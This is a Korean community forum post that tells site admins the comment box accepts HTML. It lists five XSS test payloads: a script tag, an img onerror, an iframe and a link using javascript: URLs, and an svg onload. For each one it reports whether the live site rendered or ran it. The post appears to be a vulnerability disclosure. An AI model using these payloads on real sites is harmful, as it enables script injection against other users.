Villain 커뮤니티
18+
인사이 런칭
대장님 긴급!! 긴급!! 운영진 외 접근하지 말아주세요.
잔고0원 쪽지 승인 : 2025-09-23 11:11:17
0
0

<br>이나 인식시키려고 textarea 태그의 HTML을 허용한걸로 보이는데

 

순간 다른 분의 글에 댓글 달다가 발견..

 

내용은 댓글로 확인해주세요..

 

각종 테스트 댓글로 진행해볼 예정

 

<script>alert('XSS 테스트')</script>
<img src=x onerror="alert('이미지 onerror 테스트')">
<iframe src="javascript:alert('iframe javascript 실행')"></iframe>
<a href="javascript:alert('링크 클릭 시 실행')">클릭 시 자바스크립트 실행</a>
<svg onload="alert('SVG onload 실행')"></svg>
 

사용된 코드입니다.

 

 

<script>alert('XSS 테스트')</script>

script태그는 인식되지만 내부 코드는 인식되지 않음. PASS

 

 

<img src=x onerror="alert('이미지 onerror 테스트')">

인식됨.

 

 

<iframe src="javascript:alert('iframe javascript 실행')"></iframe>

인식됨.

 

<a href="javascript:alert('링크 클릭 시 실행')">클릭 시 자바스크립트 실행</a>

인식됨.

 

<svg onload="alert('SVG onload 실행')"></svg>

코드는 인식되지만 실행은 되지 않음.

 

0
0
By 기사제보 및 정정요청 = master@villain.city
저작권자ⓒ 커뮤니티 빌런 18+ ( Villain ), 무단전재 및 재배포 Ai 학습 포함 금지
관련기사 관련기사가 없습니다.
Comment
인텔 게이머데이
Today Ranking
  • 종합
  • 뉴스/정보
  • 커뮤니티
  • 질문/토론
커뮤니티 빌런 18+ ( Villain ) Beta 2.0
본사 l 서울 금천구 가산디지털1로 33-33 대륭테크노타운2차 7층 705-5호
대표전화 l 010-4588-4581 | 서비스 시작일 l 2025-08-15
커뮤니티 빌런 18+ ( Villain ) 의 모든 콘텐츠(영상,기사, 사진)는 출처를 표기하는 조건으로 무단 전재와 복사, 배포 등을 허용합니다.
Copyright © 커뮤니티 빌런 18+ ( Villain ) All Rights Reserved.
광고
호스팅 로고